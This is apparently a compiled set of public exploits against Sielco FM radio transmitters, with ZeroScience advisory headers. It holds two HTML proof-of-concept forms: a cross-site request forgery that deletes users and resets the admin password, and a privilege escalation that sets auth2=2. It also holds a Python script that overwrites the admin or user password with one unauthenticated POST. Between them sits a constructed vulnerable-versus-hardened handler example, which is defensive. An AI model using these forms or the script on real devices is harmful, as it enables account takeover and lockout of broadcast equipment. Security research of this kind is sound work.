      <input type="submit" value="Modify admin pwd, delete all users" />
    </form>
  </body>
</html>
-
Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters for professional
broadcasting. The in-house laboratory develops standard and customised
solutions to meet all needs. Whether digital or analogue, each product is
studied to ensure reliability, resistance over time and a high standard of
safety. Sielco transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending an
HTTP POST request setting the parameter 'auth1', 'auth2' or 'auth3' to the
integer value '1' for Write or '2' for Admin permissions.

Tested on: lwIP/2.1.1
           Web/3.0.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5755
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php

26.01.2023
-->

<html>
  <body>
    <form action="http://transmitter/protect/users.htm" method="POST">
      <input type="hidden" name="pwd0" value="" />
      <input type="hidden" name="pwd0bis" value="" />
      <input type="hidden" name="user1" value="" />
      <input type="hidden" name="pwd1" value="" />
      <input type="hidden" name="pwd1bis" value="" />
      <input type="hidden" name="auth1" value="" />
      <input type="hidden" name="user2" value="test" />
      <input type="hidden" name="pwd2" value="" />
      <input type="hidden" name="pwd2bis" value="" />
      <input type="hidden" name="auth2" value="2" />
      <input type="hidden" name="user3" value="" />
      <input type="hidden" name="pwd3" value="" />
      <input type="hidden" name="pwd3bis" value="" />
      <input type="hidden" name="auth3" value="" />
      <input type="submit" value="Escalate" />
    </form>
  </body>
</html>
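The three advisories above (ZSL-2023-5757, -5756 and -5755) all hit the same handler behind /protect/users.htm with the same pwd0/pwd0bis, userN/pwdN/pwdNbis/authN fields, and all three come down to that handler trusting whoever is logged in. The following is an added example, not Sielco firmware and not the advisory author's code: a constructed in-memory model of that handler in its reported shape next to a hardened version that closes all three findings at once. The user table, the session object, the `csrf_token` and `current_pwd` fields and the 0/1/2 permission values (taken from the authN parameter description) are assumptions made for the illustration; the device's real storage and page logic are not known from the advisories.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Mapping

# Permission levels as the authN parameter is described: 0 Read, 1 Write, 2 Admin.
READ, WRITE, ADMIN = 0, 1, 2


@dataclass
class Session:
    user: str
    auth: int                                   # READ / WRITE / ADMIN
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def fresh_users() -> Dict[int, dict]:
    """Constructed user table: slot 0 is the built-in admin (pwd0/pwd0bis),
    slots 1..3 are the editable users (userN/pwdN/pwdNbis/authN)."""
    return {
        0: {"user": "admin", "pwd": "admin-secret", "auth": ADMIN},
        1: {"user": "", "pwd": "", "auth": READ},
        2: {"user": "test", "pwd": "test-pw", "auth": READ},
        3: {"user": "", "pwd": "", "auth": READ},
    }


def apply_form(users: Dict[int, dict], form: Mapping[str, str]) -> None:
    """Copy the form fields into the user table the way the exploit forms expect:
    an empty userN clears the slot, an empty pwdN/authN leaves that field alone."""
    if form.get("pwd0"):
        if form["pwd0"] != form.get("pwd0bis"):
            raise ValueError("admin password confirmation mismatch")
        users[0]["pwd"] = form["pwd0"]
    for slot in (1, 2, 3):
        name = form.get(f"user{slot}")
        if name is not None:
            users[slot]["user"] = name
        pwd = form.get(f"pwd{slot}")
        if pwd:
            if pwd != form.get(f"pwd{slot}bis"):
                raise ValueError(f"user{slot} password confirmation mismatch")
            users[slot]["pwd"] = pwd
        auth = form.get(f"auth{slot}")
        if auth not in (None, ""):
            users[slot]["auth"] = int(auth)


def users_post_vulnerable(users: Dict[int, dict], session: Session,
                          form: Mapping[str, str]) -> int:
    """Reported behaviour: any logged-in session may submit, no anti-CSRF
    token, no role check, no re-authentication for the admin password."""
    try:
        apply_form(users, form)
    except ValueError:
        return 400
    return 200


def users_post_hardened(users: Dict[int, dict], session: Session,
                        form: Mapping[str, str]) -> int:
    """Same endpoint with the three findings closed."""
    # ZSL-2023-5757: a form posted from another site carries no valid token.
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return 403
    # ZSL-2023-5756 / ZSL-2023-5755: only an Admin session may edit users,
    # passwords or permissions, whatever the form says.
    if session.auth != ADMIN:
        return 403
    # Changing the built-in admin password requires the current one.
    if form.get("pwd0") and not hmac.compare_digest(
            form.get("current_pwd", ""), users[0]["pwd"]):
        return 403
    # Reject permission values outside the documented 0/1/2 range.
    for slot in (1, 2, 3):
        auth = form.get(f"auth{slot}")
        if auth not in (None, "") and (not auth.isdigit() or int(auth) > ADMIN):
            return 400
    try:
        apply_form(users, form)
    except ValueError:
        return 400
    return 200
```

The escalation form from ZSL-2023-5755 (`user2=test`, `auth2=2`) sent by a Read session succeeds against the first handler and is refused by the second; the CSRF form from ZSL-2023-5757 is refused even for an Admin session because it cannot carry that session's token.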
-
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
## Exploit Author: LiquidWorm
#
#
# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
#
#
# Vendor: Sielco S.r.l
# Product web page: https://www.sielco.org
# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
#                   PolyEco1000 CPU:1.9.4 FPGA:10.19
#                   PolyEco1000 CPU:1.9.3 FPGA:10.19
#                   PolyEco500 CPU:1.7.0 FPGA:10.16
#                   PolyEco300 CPU:2.0.2 FPGA:10.19
#                   PolyEco300 CPU:2.0.0 FPGA:10.19
#
# Summary: PolyEco is the innovative family of high-end digital
# FM transmitters of Sielco. They are especially suited as high
# performance power system exciters or compact low-mid power
# transmitters. The same cabinet may in fact be fitted with 50,
# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
# 1000).
#
# All features can be controlled via the large touch-screen display
# 4.3" or remotely. Many advanced features are inside by default
# in the basic version such as: stereo and RDS encoder, audio
# change-over, remote-control via LAN and SNMP, "FFT" spectral
# analysis of the audio sources, SFN synchronization and much more.
#
# Desc: The application suffers from an authentication bypass and
# account takeover/lockout vulnerability that can be triggered by
# directly calling the users object and effectively modifying the
# password of the two constant user/role accounts (user/admin). This
# can be exploited by an unauthenticated adversary by issuing a single
# POST request to the vulnerable endpoint and gain unauthorized
# access to the affected device with administrative privileges.
#
# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5769
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
#
#
# 26.01.2023
#
#

import requests

print('''
        .- _ _ -.
       / / \\ \\
      ( ( (` (-o-) `) ) )
       \\ \\_ ` -+- ` _/ /
        `-  -+-  -`
     -+- -+- -+- -+- -+- -+-
            / \\

  *****************************************************
  !     Sielco PolyEco Authentication Bypass Script   !
  *****************************************************

  Please note that this script is for educational and
  ethical purposes only. Using it for unauthorized access
  or malicious activities is strictly prohibited and can
  have serious legal and ethical consequences. The
  responsibility of using this script in a lawful and
  ethical manner lies solely with the user. The author or
  creator of this script shall not be held responsible
  for any unlawful or unethical activities performed by
  the users.
''')

url = input(' Enter the URL (e.g. http://host:8090): ')
if 'http' not in url:
    url = 'http://{}'.format(url)

user = input(' Enter the desired role (e.g. user or admin): ')
if user not in ['user', 'admin']:
    exit(' Only \'user\' or \'admin\' please.')

password = input(' Enter the desired password: ')

# The users object is reachable without a session; whichever of the two
# constant accounts gets a non-empty password field is the one overwritten.
end = '/protect/users.htm'
payload = {}

if user == 'user':
    payload['pwd_admin'] = ''
    payload['pwd_user'] = password
elif user == 'admin':
    payload['pwd_admin'] = password
    payload['pwd_user'] = ''

r = requests.post(url + end, data=payload)

if r.status_code == 200:
    print('\n MSG: OK.')
else:
    print('\n MSG: ERROR!')